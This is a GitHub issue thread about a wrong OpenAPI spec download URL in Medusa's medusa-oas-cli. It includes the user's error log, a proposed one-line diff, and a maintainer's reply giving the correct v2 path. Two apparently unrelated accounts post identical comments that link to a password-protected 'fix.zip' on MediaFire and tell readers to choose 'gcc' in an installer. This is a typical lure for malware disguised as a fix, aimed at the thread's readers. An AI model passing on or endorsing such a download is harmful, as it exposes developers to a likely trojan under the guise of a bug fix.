### ISSUE TITLE
Fix URL in getPublicOas Function to Correct API Spec Download Path @medusajs/medusa-oas-cli

### ISSUE THREAD

**Issue by vholik** [medusajs/medusa#8762]
## Bug report

I encountered an issue after installing a fresh oas package using the following command:

```bash
yarn add --dev @medusajs/medusa-oas-cli@preview
``` 

Upon running generate command, I received the following error:

```bash
ResolverError: Error downloading https://docs.medusajs.com/v2/api/download/admin 
HTTP ERROR 404
    at /Users/vholik/Desktop/medusa-2-0/node_modules/@readme/json-schema-ref-parser/lib/resolvers/http.js:101:16
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5) {
  code: 'ERESOLVER',
  source: 'https://docs.medusajs.com/v2/api/download/admin',
  path: null,
  toJSON: [Function: toJSON],
  [Symbol(nodejs.util.inspect.custom)]: [Function: inspect]
}
```

### Describe the bug

I was able to resolve the issue by modifying the `getPublicOas` URL in the package code.

```diff
async function getPublicOas(apiType) {
-    const url = `https://docs.medusajs.com/v2/api/download/${apiType}`;
+    const url = `https://docs.medusajs.com/api/download/${apiType}`;
    return await openapi_parser_1.default.parse(url);
}
```

### System information

Medusa version (including plugins):
Node.js version:
Database:
Operating system:
Browser (if relevant):

### Expected behavior

A clear and concise description of what you expected to happen

### Screenshots

If applicable, add screenshots to help explain your problem

### Code snippets

If applicable, add code samples to help explain your problem

### Additional context

Add any other context about the problem here

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by shahednasser** [comment]
Hello! Are you trying to generate OAS for v1 or v2? If for v1, please use the `@latest` version instead.

However, for v2, it seems the URL is definitely incorrect. It should be `https://docs.medusajs.com/v2/api/api/download/${apiType}`. Will open a PR to fix it.

**Comment by vholik** [comment]
Hello @shahednasser. I am using Medusa 2.0.
